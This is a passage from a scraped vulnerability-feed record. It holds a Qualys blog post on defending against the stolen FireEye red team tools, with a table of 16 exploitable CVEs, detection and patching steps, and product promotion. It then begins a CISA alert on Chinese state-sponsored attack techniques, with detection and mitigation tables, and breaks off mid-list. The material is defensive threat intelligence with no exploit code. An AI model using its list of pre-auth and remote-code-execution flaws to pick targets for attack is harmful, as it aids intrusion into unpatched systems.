analysis of these tools shows that the functionality and capabilities may mimic some existing red team tools such as Metasploit or Cobalt Strike. Similar to how the Shadow Brokers leak led to outbreaks such as WannaCry, it is possible that this breach could lead to other commodity malware leveraging these capabilities. Any time there is high-fidelity threat intelligence such as the countermeasures provided by FireEye, it is important to look at it under the lens of how you can protect your organization going forward, as well as how you can validate if this has been used in your organization previously. \n\n### Mitigation & Protection \n\n[Snort](<https://www.snort.org/>) is an open-source intrusion prevention system (IPS) which uses an open format for its rule structure. While many companies use the open-source version of Snort, commercial IPS tools are also able to leverage the Snort rule format. Most of these rules are tuned to specifically look for beacon traffic or components of remote access tools. If your organization is using an IPS or IDS, you should plug in these signatures to look for evidence of future exploitation.\n\n[ClamAV](<https://www.clamav.net/>) is an open-source antivirus engine which is now owned by Cisco. To prevent these tools from executing on the endpoint, the provided signatures can be imported into this AV engine or any other antivirus which uses the ClamAV engine.\n\n[Yara](<https://github.com/VirusTotal/yara>) was designed by VirusTotal to help malware researchers both identify and classify malware samples. Yara can be used as a standalone scanning engine or built in to many endpoint security products as well. The provided rules can be imported into many endpoint security tools to match and block future execution of known malware.\n\nAnother important aspect for preventing the usage of these red teaming tools in your environment is to address the vulnerabilities they are known to exploit. There are 16 vulnerabilities which have been prioritized based on the CVSS score associated with them. Using a vulnerability management product such as [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can proactively search which endpoints or devices have these vulnerabilities and deploy patches or configuration fixes to resolve them before an adversary has a chance to exploit them. \n\n### Threat Hunting \n\nHunting for evidence of a breach is just as important as trying to prevent the breach. Two of the components FireEye released to help this search are HXIOC and Yara rules. These help define what triggers to look for to make the determination if the organization has been breached by these tools. \n\nThe HXIOC rules provided are based on the [OpenIOC](<https://github.com/mandiant/OpenIOC_1.1>) format originally created by Mandiant. These are similar to the STIX and CyBOX formats maintained by [OASIS](<https://www.oasis-open.org/committees/tc_home.php?wg_abbrev=cti>). The rules provided by FireEye call out many process names and associated command line arguments which can be used to hunt for the evidence of an attack. \n\nBy using the provided Yara rule which encompasses all of the Yara countermeasures, you can scan multiple directories using the standalone Yara engine by issuing the \u201cyara -r all-rules.yara <path>\u201d, where <path> is the location you want to recursively scan. \n\nAlternatively, VirusTotal also has a useful API called [RetroHunt](<https://support.virustotal.com/hc/en-us/articles/360001293377-Retrohunt>) which allows you to scan files submitted within the last 12 months. [Florian Roth](<https://twitter.com/cyb3rops/status/1336583694912516096>) has gone through and submitted all of the provided Yara rules to RetroHunt and created a [Google Sheets document](<https://docs.google.com/spreadsheets/d/1uRAT-khTdp7fp15XwkiDXo8bD0FzbdkevJ2CeyXeORs/edit>) containing all of the detections. In this document you can see valuable information such as the number of detections and file hashes for each of the detected samples. \n\n### Detect 16 Publicly Known Vulnerabilities using Qualys VMDR \n\nHere is a prioritized list of CVEs published on [Github](<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md>) by FireEye:\n\n**CVE** **ID**| **Name**| **CVSS**| **Qualys** **QID(s)** \n---|---|---|--- \nCVE-2019-11510| Pre-auth arbitrary file reading from Pulse Secure SSL VPNs| 10| 38771 \nCVE-2020-1472| Microsoft Active Directory escalation of privileges| 10| 91668 \nCVE-2018-13379| pre-auth arbitrary file reading from Fortinet Fortigate SSL VPN| 9.8| 43702 \nCVE-2018-15961| RCE via Adobe ColdFusion (arbitrary file upload that can be used to upload a JSP web shell)| 9.8| 371186 \nCVE-2019-0604| RCE for Microsoft Sharepoint| 9.8| 110330 \nCVE-2019-0708| RCE of Windows Remote Desktop Services (RDS)| 9.8| 91541, 91534 \nCVE-2019-11580| Atlassian Crowd Remote Code Execution| 9.8| 13525 \nCVE-2019-19781| RCE of Citrix Application Delivery Controller and Citrix Gateway| 9.8| 150273, 372305 \nCVE-2020-10189| RCE for ZoHo ManageEngine Desktop Central| 9.8| 372442 \nCVE-2014-1812| Windows Local Privilege Escalation| 9| 91148, 90951 \nCVE-2019-3398| Confluence Authenticated Remote Code Execution| 8.8| 13475 \nCVE-2020-0688| Remote Command Execution in Microsoft Exchange| 8.8| 50098 \nCVE-2016-0167| local privilege escalation on older versions of Microsoft Windows| 7.8| 91204 \nCVE-2017-11774| RCE in Microsoft Outlook via crafted document execution (phishing)| 7.8| 110306 \nCVE-2018-8581| Microsoft Exchange Server escalation of privileges| 7.4| 53018 \nCVE-2019-8394| Arbitrary pre-auth file upload to ZoHo ManageEngine ServiceDesk Plus| 6.5| 374547 \n \nQualys released several remote and authenticated QIDs for CVEs published by FireEye. You can search for these QIDs in VMDR Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.qid: [38771, 91668, 43702, 371186, 110330, 91541, 91534, 13525, 150273, 372305, 372442, 91148, 90951, 13475, 50098, 91204, 110306, 53018, 374547]_\n\n![](https://blog.qualys.com/wp-content/uploads/2020/12/Screen-Shot-2020-12-11-at-2.33.14-PM-1070x524.png)\n\n### Identify Vulnerable Assets using Qualys Threat Protection\n\nIn addition, Qualys customers can locate vulnerable host through [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) by simply clicking on the impacted hosts. This helps in effectively identifying and tracking these vulnerabilities. \n\n![](https://blog.qualys.com/wp-content/uploads/2020/12/fireeye-feed2-1070x667.png)\n\nWith VMDR Dashboard, you can track these 16 publicly known vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the [FireEye Theft Top 16 CVEs & IOC Hashes](<https://qualys-secure.force.com/customer/s/article/000006470>) dashboard. \n\n![](https://blog.qualys.com/wp-content/uploads/2020/12/TOP-2-1-1070x1747.png) \n\n### **Compensating Controls for Reducing Risk of Vulnerabilities Leveraged by FireEye Red Team Tools** \n\nTo reduce the overall security risk, it is important to address misconfigurations associated with the CVEs in addition to general security hygiene and system hardening. \n\nQualys customers can leverage the newly released policy \u201c_Compensating Controls for Reducing Risk of Vulnerabilities Leveraged by FireEye Red Team Tools_.\u201d This policy contains controls which can be used as workarounds / mitigations for these vulnerabilities if patching cannot be done immediately. \n\n**Control List: ** \n\nCVE IDs| Control ID | Statement \n---|---|--- \nCVE-2020-1472| 20002| Status of the 'Domain controller: Allow vulnerable Netlogon secure channel connections' Group policy setting \nCVE-2018-13379 | 20010 | Status of the source interface setting for SSL-VPN \nCVE-2019-19781| 13952 | Status of 'Responder' feature configured on the appliance \nCVE-2019-19781 | 20011 | Status of the responder action configured on the device \nCVE-2019-19781 | 20008 | Status of the responder policies configured on the device \nCVE-2019-19781 | 20009 | Status of the responder global binds configured on the device \nCVE-2016-0167 | 19440 | Status of Trust Center "Block macros from running in Office files from the Internet" setting for a user profile \nCVE-2018-8581 | 20007 | Status of the 'DisableLoopbackCheck' setting \nCVE-2019-0708 | 10404 | Status of the 'Require user authentication for remote connections by using Network Level Authentication' setting \nCVE-2019-0708 | 7519 | Status of the 'Allow users to connect remotely using Remote Desktop Services (Terminal Services)' setting \nCVE-2019-0708 | 1430 | Status of the 'Terminal Services' service \nCVE-2019-0708 | 3932 | Status of the 'Windows Firewall: Inbound connections (Public)' setting \nCVE-2019-0708 | 3948 | Status of the 'Windows Firewall: Inbound connections (Private)' setting \nCVE-2019-0708 | 3949 | Status of the 'Windows Firewall: Inbound connections (Domain)' setting \nCVE-2019-0708 | 3950 | Status of the 'Windows Firewall: Firewall state (Public)' setting \nCVE-2019-0708 | 3951 | Status of the 'Windows Firewall: Firewall state (Private)' setting \nCVE-2019-0708 | 3952 | Status of the 'Windows Firewall: Firewall state (Domain)' setting \nCVE-2019-0708 | 11220 | List of 'Inbound Rules' configured in Windows Firewall with Advanced Security via GPO \nCVE-2017-11774 | 13843 | Status of the 'Do not allow folders in non-default stores to be set as folder home pages' setting \nCVE-2017-11774 | 20003 | Status of the 'EnableRoamingFolderHomepages' registry setting \nCVE-2017-11774 | 20004 | Status of the 'Do not allow Home Page URL to be set in folder Properties' Group policy setting \n \nWith Qualys Configuration Management, you can easily identify misconfigured systems in context of these vulnerabilities. The screenshot below shows the total passing and failing controls for the impacted assets in the report.\n\n![](https://blog.qualys.com/wp-content/uploads/2020/12/image-18.png)\n\nView control posture details with remediation steps. The screenshot below shows control pass/fail details along with actual evidence from impacted asset. \n\n![](https://blog.qualys.com/wp-content/uploads/2020/12/image-19.png)\n\n### FireEye Disclosure of the Theft of their Red Team Assessment Tools \n\nHackers now have an influential collection of new techniques to draw upon. Qualys released a new RTI for Solorigate/SUNBURST vulnerabilities so customers can effectively prioritize these CVEs in their environment.\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), the vulnerabilities for Solorigate/SUNBURST can be prioritized for the following real-time threat indicators (RTIs):\n\n * Active Attacks\n * Solorigate Sunburst (**New RTI**)\n![](https://blog.qualys.com/wp-content/uploads/2020/12/Solori3-1-1070x417.png)\n\n### Remediate FireEye-Related Vulnerabilities with Qualys Patch Management\n\n#### Identify and Install Needed Patches\n\nTo view the relevant missing patches in your environment that are required to remediate the vulnerabilities leveraged by the FireEye tools you may run the following QQL in the Patches tab of [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>):\n \n \n (qid: [91541,372442,38771,91534,91204,110330,371186,91148,90951,43702,374547,372305,110306,50098,91668,13475,53018,13525,150273])\n\n![](https://blog.qualys.com/wp-content/uploads/2021/01/fireeyepatches-1070x528.png)\n\nIt is highly recommended to select all the patches returned by this QQL and add them to a new on-demand patch job. You can then target as many assets as possible and deploy the patch job as soon as possible. Note that the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) will only deploy the right patch to the right asset, meaning the Qualys patch job will do the mapping of patch to asset (so you don\u2019t have to) ensuring only the right patch is deployed to the right asset (in terms of binary architecture, OS version, etc). In addition, if a patch is not needed by a specific asset the Qualys agent will \u201cskip\u201d this asset and the patch will not be deployed.\n\nThe same QQL can be used in the patch assets tab in order to see all the assets that miss at least one of the FireEye-related patches:\n\n![](https://blog.qualys.com/wp-content/uploads/2020/12/assetsfireeye-1070x532.png)\n\n#### Visualize Assets Requiring Patches\n\nQualys has created two dashboard widgets that you can import into the patch management dashboard. These widgets will show the number of missing FireEye-related patches in your environment and the number of assets in your environment missing one of those patches.\n\nSteps to Import the Widget:\n\n * Click on "Setting" icon in "Dashboard" section.\n * Select "Import New Widget" option.\n * Enter a name of your choice for the widget.\n * Browse the JSON file to import.\n * Click on "Import" button.\n * On success, you should see the new widget in your Dashboard.\n\nYou can download these two dashboard widgets from the PatchMGMT-Fireeye-Widgets attachment at the bottom of the [FireEye Theft dashboards](<https://qualys-secure.force.com/customer/s/article/000006470>) article. \n\n### Hunting in Endpoint Detection and Response (EDR) \n\nThere are two components to hunt for evidence of these tools using the [Qualys EDR](<https://www.qualys.com/apps/endpoint-detection-response/>). The first is looking for evidence of the files from the provided Yara signatures. Qualys has taken the file hashes from the RetroHunt tool and created a dashboard. With a single click you can find evidence of any matches in your environment. \n\nThe second component is hunting for evidence of the processes outlined in the OpenIOC signatures. While these signatures cannot be imported directly into Qualys EDR, the Qualys Labs team is converting these into Qualys Query Language (QQL) which can be used in the Qualys EDR hunting page. An example provided here shows hunting for [this Seatbelt signature](<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/rules/BELTALOWDA/supplemental/hxioc/SEATBELT%20\$UTILITY\$.ioc>). In the coming days, these hunting queries will be available to all Qualys EDR customers. \n\n![](https://blog.qualys.com/wp-content/uploads/2020/12/image-2.png)\n\n![](https://blog.qualys.com/wp-content/uploads/2020/12/image-4.png)\n\n### Get Started Now \n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) to automatically identify, detect and patch the high-priority publicly known vulnerabilities. \n\nStart your [Qualys EDR trial](<https://www.qualys.com/apps/endpoint-detection-response/>) to protect the entire attack chain, from attack and breach prevention to detection and response using the power of the Qualys Cloud Platform \u2013 all in a single, cloud-based app. \n\nStart your [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) trial to access the Live Threat Intelligence Feed that displays the latest vulnerability disclosures and maps them to your impacted IT assets. You can see the number of assets affected by each threat, and drill down into asset details. \n\n### References \n\n<https://github.com/fireeye/red_team_tool_countermeasures>\n\n<https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html>\n\n<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md>\n\n<https://www.fireeye.com/blog/threat-research/2020/12/unauthorized-access-of-fireeye-red-team-tools.html>", "cvss3": {}, "published": "2020-12-10T00:48:29", "type": "qualysblog", "title": "Solorigate/Sunburst : Theft of Cybersecurity Tools | FireEye Breach", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2014-1812", "CVE-2016-0167", "CVE-2017-11774", "CVE-2018-13379", "CVE-2018-15961", "CVE-2018-8581", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-19781", "CVE-2019-3398", "CVE-2019-8394", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1472"], "modified": "2020-12-10T00:48:29", "id": "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ics": [{"lastseen": "2023-12-03T17:29:53", "description": "### Summary\n\n_This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/matrices/enterprise/>) framework for all referenced threat actor techniques._\n\n_**Note**: on October 20, 2020, the National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) providing information on publicly known vulnerabilities exploited by Chinese state-sponsored cyber actors to target computer networks holding sensitive intellectual property, economic, political, and military information. This Alert has been updated to include information on vulnerabilities exploited by Chinese state-sponsored actors (see Table 4)._\n\nIn light of heightened tensions between the United States and China, the Cybersecurity and Infrastructure Security Agency (CISA) is providing specific Chinese government and affiliated cyber threat actor tactics, techniques, and procedures (TTPs) and recommended mitigations to the cybersecurity community to assist in the protection of our Nation\u2019s critical infrastructure. In addition to the recommendations listed in the Mitigations section of this Alert, CISA recommends organizations take the following actions.\n\n 1. **Adopt a state of heightened awareness. **Minimize gaps in personnel availability, consistently consume relevant threat intelligence, and update emergency call trees.\n 2. **Increase organizational vigilance.** Ensure security personnel monitor key internal security capabilities and can identify anomalous behavior. Flag any known Chinese indicators of compromise (IOCs) and TTPs for immediate response.\n 3. **Confirm reporting processes.** Ensure personnel know how and when to report an incident. The well-being of an organization\u2019s workforce and cyber infrastructure depends on awareness of threat activity. Consider [reporting incidents](<https://us-cert.cisa.gov/report>) to CISA to help serve as part of CISA\u2019s early warning system (see the Contact Information section below).\n 4. **Exercise organizational incident response plans.** Ensure personnel are familiar with the key steps they need to take during an incident. Do they have the accesses they need? Do they know the processes? Are various data sources logging as expected? Ensure personnel are positioned to act in a calm and unified manner.\n\n### Technical Details\n\n#### China Cyber Threat Profile\n\nChina has a history of using national military and economic resources to leverage offensive cyber tactics in pursuing its national interests. The \u201cMade in China 2025\u201d 10-year plan outlines China\u2019s top-level policy priorities.[[1](<https://www.whitehouse.gov/wp-content/uploads/2018/06/FINAL-China-Technology-Report-6.18.18-PDF.pdf>)],[[2](<https://fas.org/sgp/crs/row/IF10964.pdf>)] China may seek to target the following industries deemed critical to U.S. national and economic interests: new energy vehicles, next generation information technology (IT), biotechnology, new materials, aerospace, maritime engineering and high-tech ships, railway, robotics, power equipment, and agricultural machinery.[[3](<https://www.cfr.org/backgrounder/made-china-2025-threat-global-trade>)] China has exercised its increasingly sophisticated capabilities to illegitimately obtain U.S. intellectual property (IP), suppress both social and political perspectives deemed dangerous to China, and harm regional and international opponents.\n\nThe U.S. Intelligence Community and various private sector threat intelligence organizations have identified the Chinese People\u2019s Liberation Army (PLA) and Ministry of State Security (MSS) as driving forces behind Chinese state-sponsored cyberattacks\u2013either through contractors in the Chinese private sector or by the PLA and MSS entities themselves. China continues to engage in espionage-related activities that include theft of sensitive information such as innovation capital, IP, and personally identifiable information (PII). China has demonstrated a willingness to push the boundaries of their activities to secure information critical to advancing their economic prowess and competitive advantage.\n\n#### Chinese Cyber Activity\n\nAccording to open-source reporting, offensive cyber operations attributed to the Chinese government targeted, and continue to target, a variety of industries and organizations in the United States, including healthcare, financial services, defense industrial base, energy, government facilities, chemical, critical manufacturing (including automotive and aerospace), communications, IT, international trade, education, videogaming, faith-based organizations, and law firms.\n\nAdditionally, numerous Department of Justice (DOJ) indictments over several years provide evidence to suggest Chinese threat actors continuously seek to illegally obtain and exfiltrate U.S. IP. Their targets also include western companies with operations inside China.\n\nPublic reporting that associates Chinese actors with a range of high-profile attacks and offensive cyber activity includes:\n\n * **February 2013 \u2013 Cyber Threat Intelligence Researchers Link Advanced Persistent Threat (APT) 1 to China:** a comprehensive report publicly exposed APT1 as part of China\u2019s military cyber operations and a multi-year effort that exfiltrated IP from roughly 141 companies spanning 20 major industries.[[4](<https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf>)] APT1 established access to the victims\u2019 networks and methodically exfiltrated IP across a large range of industries identified in China\u2019s 12th 5-Year Plan. A year later, the DOJ indicted Chinese cyber threat actors assigned to PLA Unit 61398 for the first time (also highlighted in the report).[[5](<https://www.justice.gov/opa/pr/us-charges-five-chinese-military-hackers-cyber-espionage-against-us-corporations-and-labor>)]\n * **April 2017 \u2013 Chinese APTs Targeting IP in 12 Countries:** CISA announced Chinese state-backed APTs carried out a multi-year campaign of cyber-enabled IP theft that targeted global technology service providers and their customers. The threat actors leveraged stolen administrative credentials (local and domain) and placed sophisticated malware on critical systems in an effort to steal the IP and sensitive data of companies located in at least 12 countries.[[6](<https://us-cert.cisa.gov/ncas/alerts/TA17-117A>)]\n * **December 2018 \u2013 Chinese Cyber Threat Actors Indicted for Compromising Managed Service Providers (MSPs):** DOJ indicted two Chinese cyber threat actors believed to be associated with APT10, who targeted MSPs and their large customer base through phishing and spearphishing campaigns aimed at exfiltrating sensitive business data and, possibly, PII.[[7](<https://www.justice.gov/opa/speech/deputy-attorney-general-rod-j-rosenstein-announces-charges-against-chinese-hackers>)] CISA also briefed stakeholders on Chinese APT groups who targeted MSPs and their customers to steal data and further operationalize commercial and economic espionage.[[8](<https://us-cert.cisa.gov/sites/default/files/publications/Chinese-Cyber-Activity-Targeting-Managed-Service-Providers.pdf>)]\n * **February 2020 \u2013 China\u2019s Military Indicted for 2017 Equifax Hack:** DOJ indicted members of China\u2019s PLA for stealing large amounts of PII and IP. The Chinese cyber threat actors exploited a vulnerability in the company\u2019s dispute resolution website to enter the network, conduct reconnaissance, upload malware, and steal credentials to extract the targeted data. The breach impacted roughly half of all American citizens and stole Equifax\u2019s trade secrets.[[9](<https://www.justice.gov/opa/speech/attorney-general-william-p-barr-announces-indictment-four-members-china-s-military>)]\n * **May 2020 \u2013 China Targets COVID-19 Research Organizations:** the Federal Bureau of Investigation (FBI) and CISA reported the targeting and compromise of U.S. organizations conducting COVID-19-related research by cyber actors affiliated with China.[[10](<https://www.cisa.gov/news/2020/05/13/fbi-and-cisa-warn-against-chinese-targeting-covid-19-research-organizations>)] Large-scale password spraying campaigns were a commonly observed tactic in illicitly obtaining IP related to vaccines, treatments, and testing from networks and personnel affiliated with COVID-19-related research.[[11](<https://us-cert.cisa.gov/ncas/alerts/AA20126A>)],[[12](<https://us-cert.cisa.gov/ncas/current-activity/2020/08/03/chinese-malicious-cyber-activity%20>)]\n\n#### Common TTPs of Publicly Known Chinese Threat Actors\n\nThe section below provides common, publicly known, TTPs employed by Chinese threat actors, which map to the MITRE ATT&CK framework. Where possible, the tables include actions for detection and mitigation. This section is not exhaustive and does not detail all TTPs or detection and mitigation actions. \n\n#### PRE-ATT&CK TTPs\n\nChinese threat actors commonly use the techniques listed in table 1 to achieve reconnaissance (_Technical Information Gathering_ [[TA0015](<https://attack.mitre.org/tactics/TA0015/>)]), staging (_Stage Capabilities_ [[TA0026](<https://attack.mitre.org/tactics/TA0026/>)]), and testing (_Test Capabilities_ [[TA0025](<https://attack.mitre.org/tactics/TA0025/>)]) before executing an attack. PRE-ATT&CK techniques can be difficult to detect and mitigate, however, defenders should be aware of the use of these techniques.\n\n_Table 1: Chinese threat actor PRE-ATT&CK techniques_\n\n**Technique** | **Description** \n---|--- \n_Acquire and/or Use 3rd Party Software Services_ [[T1330](<https://attack.mitre.org/techniques/T1330/>)] | Staging and launching attacks from software as a service solutions that cannot be easily tied back to the APT \n_Compromise 3rd Party Infrastructure to Support Delivery_ [[T1334](<https://attack.mitre.org/techniques/T1334/>)] | Compromising infrastructure owned by other parties to facilitate attacks (instead of directly purchasing infrastructure) \n_Domain Registration Hijacking_ [[T1326](<https://attack.mitre.org/techniques/T1326/>)] | Changing the registration of a domain name without the permission of its original registrant and then using the legitimate domain as a launch point for malicious purposes \n_Acquire Open-Source Intelligence (OSINT) Data Sets and Information_ [[T1247](<https://attack.mitre.org/techniques/T1247/>)] | Gathering data and information from publicly available sources, including public-facing websites of the target organization \n_Conduct Active Scanning _[[T1254](<https://attack.mitre.org/techniques/T1254/>)] | Gathering information on target systems by scanning the systems for vulnerabilities. Adversaries are likely using tools such as Shodan to identify vulnerable devices connected to the internet \n_Analyze Architecture and Configuration Posture _[[T1288](<https://attack.mitre.org/techniques/T1288/>)] | Analyzing technical scan results to identify architectural flaws, misconfigurations, or improper security controls in victim networks \n_Upload, Install, and Configure Software/Tools_ [[T1362](<https://attack.mitre.org/techniques/T1362>)] | Placing malware on systems illegitimately for use during later stages of an attack to facilitate exploitability and gain remote access \n \n#### Enterprise ATT&CK TTPs\n\nChinese threat actors often employ publicly known TTPs against enterprise networks. To orchestrate attacks, they use commonly implemented security testing tools and frameworks, such as:\n\n * Cobalt Strike and Beacon\n * Mimikatz\n * PoisonIvy\n * PowerShell Empire\n * China Chopper Web Shell\n\nTable 2 lists common, publicly known, TTPs used by Chinese threat actors against enterprise networks and provides options for detection and mitigation based on the MITRE ATT&CK framework.\n\n_Table 2: Common Chinese threat actor techniques, detection, and mitigation_\n\n**Technique / Sub-Technique** | **Detection** | **Mitigation** \n---|---|--- \n_Obfuscated Files or Information _[[T1027](<https://attack.mitre.org/techniques/T1027/>)] | \n\n * Detect obfuscation by analyzing signatures of modified files.\n * Flag common syntax used in obfuscation.\n| \n\n * Use antivirus/antimalware software to analyze commands after processing. \n_Phishing: Spearphishing Attachment _[[T1566.001](<https://attack.mitre.org/techniques/T1566/001/>)] and _Spearphishing Link _[[T1566.002](<https://attack.mitre.org/techniques/T1566/002/>)] | \n\n * Use network intrusion detection systems (NIDS) and email gateways to detect suspicious attachments in email entering the network.\n * Use detonation chambers to inspect email attachments in isolated environments.\n| \n\n * Quarantine suspicious files with antivirus solutions.\n * Use network intrusion prevention systems to scan and remove malicious email attachments.\n * Train users to identify phishing emails and notify IT. \n_System Network Configuration Discovery_ [[T1016](<https://attack.mitre.org/techniques/T1016/>)] | \n\n * Monitor for processes and command-line arguments that could be used by an adversary to gather system and network information.\n| \n\n * This technique is difficult to mitigate with preventative controls; organizations should focus on detecting and responding to malicious activity to limit impact. \n_Command and Scripting Interpreter: Windows Command Shell _[[T1059.003](<https://attack.mitre.org/techniques/T1059/003/>)] | \n\n * Identify normal scripting behavior on the system then monitor processes and command-line arguments for suspicious script execution behavior.\n| \n\n * Only permit execution of signed scripts.\n * Disable any unused shells or interpreters. \n \n_User Execution: Malicious File _[[T1204.002](<https://attack.mitre.org/techniques/T1204/002/>)] | \n\n * Monitor execution of command-line arguments for applications (including compression applications) that may be used by an adversary to execute a user interaction.\n * Set antivirus software to detect malicious documents and files downloaded and installed on endpoints.\n| \n\n * Use execution prevention to prevent the running of executables disguised as other files.\n * Train users to identify phishing attacks and other malicious events that may require user interaction. \n_Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder _[[T1547.001](<https://attack.mitre.org/techniques/T1547/001/>)] | \n\n * Monitor the start folder for additions and changes.\n * Monitor registry for changes to run keys that do not correlate to known patches or software updates.\n| \n\n * This technique is difficult to mitigate with preventative controls; organizations should focus on detecting and responding to malicious activity to limit impact. \n_Command and Scripting Interpreter: PowerShell _[[T1059.001](<https://attack.mitre.org/techniques/T1059/001/>)] | \n\n * Enable PowerShell logging.\n * Monitor for changes in PowerShell execution policy as a method of identifying malicious use of PowerShell.\n * Monitor for PowerShell execution generally in environments where PowerShell is not typically used.\n| \n\n * Set PowerShell execution policy to execute only signed scripts.\n * Disable PowerShell if not needed by the system.\n * Disable WinRM service to help prevent use of PowerShell for remote execution.\n * Restrict PowerShell execution policy to administrators. \n_Hijack Execution Flow: DLL Side-Loading _[[T1574.002](<https://attack.mitre.org/techniques/T1574/002/>)] | \n\n * Track Dynamic Link Library (DLL) metadata, and compare DLLs that are loaded at process execution time against previous executions to detect usual differences unrelated to patching.\n| \n\n * Use the program `sxstrace.exe` to check manifest files for side-loading vulnerabilities in software.\n * Update software regularly including patches for DLL side-loading vulnerabilities. \n_Ingress Tool Transfer_ [[T1105](<https://attack.mitre.org/techniques/T1105/>)] | \n\n * Monitor for unexpected file creation or files transfer into the network from external systems, which may be indicative of attackers staging tools in the compromised environment.\n * Analyze network traffic for unusual data flows (i.e., a client sending much more data than it receives from a server).\n| \n\n * Use network intrusion detection and prevention systems to identify traffic for specific adversary malware or unusual data transfer over protocols such as File Transfer Protocol. \n_Remote System Discovery_ [[T1018](<https://attack.mitre.org/techniques/T1018/>)] | \n\n * Monitor processes and command-line arguments for actions that could be taken to gather system and network information.\n * In cloud environments, usage of commands and application program interfaces (APIs) to request information about remote systems combined with additional unexpected commands may be a sign of malicious use.\n| \n\n * This technique is difficult to mitigate with preventative controls; organizations should focus on detecting and responding to malicious activity to limit impact. \n_Software Deployment Tools_ [[T1072](<https://attack.mitre.org/techniques/T1072/>)] | \n\n * Identify the typical use pattern of third-party deployment software, then monitor for irregular deployment activity.\n| \n\n * Isolate critical network systems access using group policies, multi-factor authentication (MFA), and firewalls.\n * Patch deployment systems regularly.\n * Use unique and limited credentials for access to deployment systems. \n_Brute Force: Password Spraying_ [[T1110.003](<https://attack.mitre.org/techniques/T1110/003/>)] | \n\n * Monitor logs for failed authentication attempts to valid accounts.\n| \n\n * Use MFA.\n * Set account lockout policies after a certain number of failed login attempts. \n_Network Service Scanning_ [[T1046](<https://attack.mitre.org/techniques/T1046/>)] | \n\n * Use NIDS to identify scanning activity.\n| \n\n * Close unnecessary ports and services.\n * Segment network to protect critical servers and devices. \n_Email Collection _[[T1114](<https://attack.mitre.org/techniques/T1114/>)] | \n\n * Monitor processes and command-line arguments for actions that could be taken to gather local email files.\n| \n\n * Encrypt sensitive emails.\n * Audit auto-forwarding email rules regularly.\n * Use MFA for public-facing webmail servers. \n_Proxy: External Proxy_ [[T1090.002](<https://attack.mitre.org/techniques/T1090/002/>)] | \n\n * Analyze network data for uncommon data flows, such as a client sending significantly more data than it receives from an external server.\n| \n\n * Use NIDS and prevention systems to identify traffic for specific adversary malware using network signatures. \n_Drive-by Compromise _[[T1189](<https://attack.mitre.org/techniques/T1189/>)] | \n\n * Use Firewalls and proxies to inspect URLs for potentially known-bad domains or parameters.\n * Monitor network intrusion detection systems (IDS) to detect malicious scripts, and monitor endpoints for abnormal behavior.\n\n| \n\n * Isolate and sandbox impacted systems and applications to restrict the spread of malware.\n * Leverage security applications to identify malicious behavior during exploitation.\n * Restrict web-based content through ad-blockers and script blocking extensions. \n_Server Software Component: Web Shell_ [[T1505.003](<https://attack.mitre.org/techniques/T1505/003/>)] | \n\n * Analyze authentication logs, files, netflow/enclave netflow, and leverage process monitoring to discover anomalous activity.\n| \n\n * Patch vulnerabilities in internet facing applications.\n * Leverage file integrity monitoring to identify file changes.\n * Configure server to block access to the web accessible directory through principle of least privilege. \n_Application Layer Protocol: File Transfer Protocols _[[T1071.002](<https://attack.mitre.org/techniques/T1071/002/>)] and _DNS_ [[T1071.004](<https://attack.mitre.org/techniques/T1071/004/>)] | \n\n * Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server).\n * Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.\n| \n\n * Leverage NIDS and NIPS using network signatures to identify traffic for specific adversary malware. \n \n#### Additional APT Activity\n\nThe TTPs listed above have been repeatedly used across the spectrum of Chinese threat actors. The mitigations referenced in this alert can help reduce vulnerability to these TTPs; however, defenders should also maintain heightened awareness of threats actors that are more innovative in their approach, making it difficult to detect and respond to compromise. Publicly reported examples[[13](<https://www.fireeye.com/current-threats/apt-groups.html>)] include:\n\n * **APT3 **(known as UPS Team) is known for deploying zero-day attacks that target Internet Explorer, Firefox, and Adobe Flash Player. The group\u2019s custom implants and changing Command and Control (C2) infrastructure make them difficult to track. APT3 exploits use Rivest Cypher 4 (RC4) encryption to communicate and bypass address space layout randomization (ASLR)/Data Execution Prevention (DEP) by using Return Oriented Programming (ROP) chains.[[14](<https://attack.mitre.org/groups/G0022/>)]\n * **APT10 **(known as MenuPass Group) has established accessed to victim networks through compromised service providers, making it difficult for network defenders to identify the malicious traffic.\n * **APT19** (known as Codoso and Deep Panda) is known for developing custom Rich Text Format (RTF) and macro-enabled Microsoft Office documents for both implants and payloads. The group has backdoored software, such as software serial generators, and has an elite use of PowerShell for C2 over Hyper Text Transfer Protocol (HTTP)/Hyper Text Transfer Protocol Secure (HTTPS).[[15](<https://attack.mitre.org/groups/G0073/>)]\n * **APT40** (known as Leviathan) has targeted external infrastructure with success, including internet-facing routers and virtual private networks.\n 